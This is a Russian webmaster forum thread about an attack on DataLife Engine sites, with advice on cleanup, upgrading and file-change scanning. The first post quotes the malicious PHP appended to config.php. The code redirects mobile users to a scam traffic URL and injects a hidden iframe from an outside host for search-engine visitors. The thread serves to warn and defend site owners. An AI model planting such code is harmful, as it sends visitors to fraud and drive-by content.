Очередная атака на DLE

Dimanchik
На сайте с 30.07.2008
Offline
87
1448

Вчера все сайты на DLE были атакованы. В engine/data/config.php в конце был добавлен код:


if(preg_match('/midp|wap|windows ce|samsung|panasonic|nokia|pocket pc|android|netfront|sharp|portalmmm|blackberry|sagem|sgh|xda|ppc|240x320|sonyericsson|pocket pc|android|opera mini|mini|mobile symbian|sybmian/i', strtolower($_SERVER['HTTP_USER_AGENT']))) {header('Location: http://get.nyanphone.com/tds/auto?r=7329&l=4-5-6-7-8-9-10-11-27&ul=');exit();}
if(preg_match('/google|yandex|bing|yahoo/i', strtolower($_SERVER['HTTP_REFERER']))) {
function nyancallback($buffer) {return (str_replace("</body>", '<iframe src="http://simple-counter.net/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>', $buffer)); }
ob_start("nyancallback");
}

Он переадресовывал всех посетителей мобильных браузеров на сайты http://om65.ru или http://browser-up.ru, где предлагается фейковое обновление оперы мини за смс (разумеется не бесплатно).

Проверьте свои сайты и будьте бдительны.

wwwwww
На сайте с 29.04.2011
Offline
195
#1
Dimanchik:
Проверьте свои сайты и будьте бдительны.

Симптомы есть, а лечение чем провдилось?

Что стало причиной успешности такой атаки?

Видишь? Свободная подпись.
Dimanchik
На сайте с 30.07.2008
Offline
87
#2

Пока просто удалили вредоносный код из config.php.

Заметили, что атаке подверглись сайты с версией 8.3 и ниже. 9.0 уже не тронуло.

Причиной успешности стала какая-нибудь дыра в движке. Конечно нужно обновлять всё до последней версии, но не успеваем.

Фрукт
На сайте с 03.04.2007
Offline
126
#3

Шелл удалить не забудьте :)

------------------- green fruct has told
vandamme
На сайте с 30.11.2008
Offline
664
#4

угу, и то место как он туда попал :)

WebAlt
На сайте с 02.12.2007
Offline
238
#5

ТС, также не забываем про http://dle-news.ru/bags/ :)

ПРОМОКОД НА СКИДКУ 25% (64821976): аренда VPS/VDS - firstvds.ru | выделенные серверы - firstdedic.ru | облачный сервер - ispserver.ru | Локация: РФ, Москва, ПУ: ISPmanager 6.
wwwwww
На сайте с 29.04.2011
Offline
195
#6
WebAlt:
ТС, также не забываем про http://dle-news.ru/bags/

Судя по ссылке они сумками торгуют, а не латанием дыр.

Dimanchik
На сайте с 30.07.2008
Offline
87
#7

Да, шелл нашли и удалили. Будем обновляться на последнюю версию.

Станислав
На сайте с 27.12.2009
Offline
223
#8
Dimanchik:
Проверьте свои сайты и будьте бдительны.

Ставьте себе сканер и не будет проблем с проверкой, уже давно юзаю, запуск по крону, отчет о изменении файлов на мыло, очень удобный скрипт http://scriptland.com.ua/315-filechecker-20-skaner-faylov-cron.html

Ну это для тех хорошо у кого много сайтов и по ФТП лазить влом. Думаю кому нибудь пригодиться.

ТС, проверьте логи сервера, посмотрите по какому урлу взломали сайт, если найдете можно будет устранить проблему.

Мы там, где рады нас видеть.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий